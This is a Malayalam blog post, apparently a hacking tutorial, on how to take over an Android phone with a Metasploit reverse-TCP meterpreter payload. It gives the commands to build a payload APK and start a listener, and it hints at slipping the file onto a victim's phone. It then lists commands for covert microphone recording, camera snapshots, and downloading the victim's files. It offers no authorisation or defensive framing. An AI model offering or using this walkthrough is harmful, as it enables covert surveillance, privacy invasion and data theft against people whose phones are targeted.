ആന്ഡ്രോയിഡ് ഫോണ് ഹാക്ക് ചെയ്യുന്നത് എങ്ങനെ ?
ഇപ്പോള് സാധാരണമായി ഉപയോഗിച്ചുവരുന്ന സ്മാര്ട്ട് ഫോണുകളില് ഭൂരിഭാഗവും ആന്ഡ്രോയിഡ് അടിസ്ഥാനമാക്കി ഉള്ളതാണ്. അതുകൊണ്ടുതന്നെ ഒരു ആന്ഡ്രോയിഡ് ഫോണ് എങ്ങനെ ഹാക്ക് ചെയ്യാം എന്നത് നമ്മില് പലരും അന്വേഷിചിട്ടുണ്ടാവും. ഒരു ആന്ഡ്രോയിഡ് ഫോണ് എങ്ങനെ ഹാക്ക് ചെയ്യാം എന്നാണ് ഈ പോസ്റ്റിലുടെ ഞാന് പറയുവാന് പോകുന്നത്. ഇവിടെ ഞാന് ഉപയോഗിക്കുന്നത് മെറ്റാസ്പ്ലോയിറ്റ് എന്ന ഒരു സോഫ്റ്റ്വെയര് ആണ്. ഇതിനെപ്പറ്റി മുന്പ് വിശദമായി പോസ്റ്റ് ചെയ്തിരുന്നു. ഇപ്പോള് ഇതുപയോഗിച്ച് എങ്ങനെ ഒരു ആന്ഡ്രോയിഡ് ഫോണ് ഹാക്ക് ചെയ്യാം എന്ന് കാണാം.
ഹാക്കിംഗ് രംഗത്ത് സാധാരണമായി ഉപയോഗിച്ചുവരുന്ന റിവേര്സ് TCP (Reverse TCP) എന്ന രീതി അന്ന് ഞാന് ഇവിടെ ഉപയോഗിക്കുന്നത്. അതായത്. നമ്മള് മെറ്റാസ്പ്ലോയിറ്റ് ഉപയോഗിച്ച് ഒരു പേലോഡ് നിര്മിക്കുകയും അത് മൊബൈല് ഫോണില് execute ചെയ്യുമ്പോള് നമ്മുടെ കമ്പ്യൂട്ടറിലേക്ക് ഒരു കണക്ഷന് സൃഷ്ടിക്കപ്പെടുകയും ചെയ്യുന്നു. ഈ കണക്ഷന് മുഖേന ആ ഫോണിലെ വിവരങ്ങള് നമുക്ക് ലഭ്യമാകുകയും ചെയ്യുന്നു.
ഇനി ഇത് എങ്ങനെ ചെയ്യാം എന്ന് നോക്കാം.
ആദ്യം ലിനക്സില് ഒരു ടെര്മിനല് വിന്ഡോ തുറക്കുക. (അതിനായി Ctrl+Alt+T എന്ന ഷോര്ട്ട് കട്ട് ഉപയോഗിച്ചാല് മതിയാവും)
അതിനുശേഷം താഴെക്കാണുന്ന രീതിയില് command ടൈപ്പ് ചെയ്യുക.
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker ip adress>ഇവിടെ attacker ip adress എന്ന ഭാഗത്ത് നമ്മുടെ ഐ പി അഡ്രസ്സും, port number എന്ന ഭാഗത്ത് നമ്മുടെ കമ്പ്യൂട്ടറിലേക്ക് കണക്ഷന് വരേണ്ട പോര്ട്ടിന്റെ നമ്പറും കൊടുക്കുക. (ചിത്രം കാണുക)
LPORT=<port number> R > hack.apk
ഇവിടെ എന്റെ ഐ പി അഡ്രെസ്സ് 192.168.8.94 ഉം പോര്ട്ട് നമ്പര് 443 ഉം ആണ്.
(നിങ്ങളുടെ ഐ പി അഡ്രെസ്സ് അറിയുവാനായി ലിനക്സ് ടെര്മിനലില് ifconfig എന്ന കമാന്ഡ് ഉപയോഗിച്ചാല് മതി.)
ഇപ്പോള് നിങ്ങളുടെ ഡസ്ക് ടോപ്പില് hack.apk എന്ന ഒരു ഫയല് കാണാം. ഇതാണ് നമ്മുടെ പേലോഡ് ഉള്ള ഫയല്. ഇത് നമുക്ക് ഹാക്ക് ചെയ്യേണ്ട ഫോണില് റണ് ചെയ്യണം. നേരിട്ടോ ഇന്റര്നെറ്റ് വഴിയോ മറ്റെന്തെങ്കിലും മാര്ഗത്തിലൂടെയോ നമുക്ക് ഇത് ചെയ്യാം. ( അത് നിങ്ങളുടെ കഴിവ് പോലെ ;) )
ഇനി അത് ഫോണില് റണ് ചെയ്യുമ്പോള് നമ്മുടെ കംപ്യൂട്ടറിലേക്ക് വരുന്ന കണക്ഷനെ എങ്ങനെ കൈകാര്യം ചെയ്യാം എന്ന് നോക്കാം.
അതിനായി msfconsole തുറക്കുക. (ടെര്മിനലില് അത് ടൈപ്പ് ചെയ്ത് എന്റര് അമര്ത്തിയാല് മതി)
ഇനി താഴെ കാണുന്ന കമാന്ഡ് ടൈപ്പ് ചെയ്യുക.
use exploit/multi/handler
set payload android/meterpreter/reverse_tcpഇനി മുന്പ് ചെയ്തതുപോലെ LHOSTഉം LPORTഉം സെറ്റ് ചെയ്യുക. (ചിത്രം കാണുക)
പിന്നെ കണക്ഷനുകള് സ്വീകരിക്കാനായി exploit എന്ന കമാന്ഡ് കൂടി കൊടുക്കുക.
ഇപ്പോള് മുന്പ് നമ്മള് നല്കിയ പോര്ട്ടിലേക്ക് എന്തെങ്കിലും കണക്ഷനുകള് വരുന്നുണ്ടോ എന്ന് കമ്പ്യൂട്ടര് ശ്രദ്ധിക്കുകയായിരിക്കും.
ഈ സമയത്ത് നമ്മുടെ മുന്പത്തെ ആ apk ഫയല് ഫോണില് തുറക്കുക. അപ്പോള് ഫോണില് ഒരു വലിയ ബട്ടന് കാണാം. അത് അമര്ത്തുക (അല്ലെങ്കില് അമര്തിപ്പിക്കുക :p )
അപ്പോള് നിങ്ങളുടെ സ്ക്രീനില് ഇങ്ങനെ ചിലത് കാണാന് കഴിയും (ചിത്രം കാണുക)
ഇപ്പോള് ഫോണില്നിന്നുള്ള കണക്ഷന് കമ്പ്യൂട്ടറില് എത്തിക്കഴിഞ്ഞിരിക്കുന്നു.
ഇനി നമുക്ക് ആ ഫോണിനെ ചൂഷണം ചെയ്യാന് ആരംഭിക്കാം :p
ഉദാഹരണങ്ങള്:
ആ ഫോണിന്റെ വിവരങ്ങള് അറിയാന് sysinfo എന്ന കമാന്ഡ് ഉപയോഗിക്കുക.
ഫോണിന്റെ മൈക്രോഫോണ് ഉപയോഗിച്ച് ശബ്ദം റെക്കോര്ഡ് ചെയ്യാന് record_mic എന്ന കമാന്ഡ് ഉപയോഗിക്കാം.
ആ ഫോണിന്റെ ക്യാമറ ഉപയോഗിച്ച് ഫോട്ടോ എടുക്കുവാനായി webcam_snap 1 എന്ന കമാന്ഡ് ഉപയോഗിക്കാം. ഇനി മുന്പിലുള്ള ക്യാമറ ഉപയോഗിച്ചുള്ള ഫോട്ടോ ആണ് വേണ്ടത് എങ്കില് webcam_snap 2 എന്ന് കൊടുത്താല് മതി. ഫോട്ടോ ഡസ്ക്ടോപ്പില് നോക്കിയാല് കാണാം (ചിത്രം കാണുക.)
ഇതുപയോഗിച്ച് ആ ഫോണിലെ ഫയലുകളും സോഫ്റ്റ്വെയറുകളും മറ്റു വിവരങ്ങളും നമുക്ക് കാണാന് സാധിക്കും. അത് റൂട്ട് ചെയ്യാത്ത ഫോണ് ആണെങ്കില് ചില പരിമിതികള് ഉണ്ടാവും എന്ന് മാത്രം.
ഇനി ആ ഫോണില് നിന്ന് ഫയലുകള് എങ്ങനെ അടിച്ചുമാറ്റാം എന്ന് നോക്കാം.
- ls എന്ന കമാന്ഡ് ഉപയോഗിച്ചാല് നിലവിലുള്ള ഫോള്ഡര് ഇല് ഉള്ള ഫയലുകളുടെ ലിസ്റ്റ് കാണാം.
- cd എന്ന കമാന്ഡ് ഉപയോഗിച്ചാല് മറ്റൊരു ഫോള്ഡര് ലേക്ക് പോകാം. ഉദാ: cd /images/mohanlal
- ഫയലുകള് നമ്മുടെ കമ്പ്യൂട്ടറിലേക്ക് ഡൌണ്ലോഡ് ചെയ്യാന് download filename എന്ന് കൊടുത്താല് മതി. ഉദാ: download image.jpg
- ഫോള്ഡര് നിര്മിക്കാന് mkdir എന്ന കമാന്ഡ് ഉപയോഗിക്കാം ഉദാ: mkdir sasi
- ഫോണിലേക്ക് ഒരു ഫയല് അപ്ലോഡ് ചെയ്യാന് upload കമാന്ഡ് ഉപയോഗിക്കാം. ഉദാ: upload video.mp4
ഈ പോസ്റ്റ് നിങ്ങള്ക്ക് ഉപയോഗപ്രദമായി എന്ന് കരുതുന്നു. അഭിപ്രായങ്ങള് താഴെ രേഖപ്പെടുത്തുക.
1 comments:
സംഗതി okke ushaar. But ആൻഡ്രോയിഡിൽ നിന്ന് എങ്ങനെ ഹാക്ക് ചെയ്യാം എന്നദ് പറയാവോ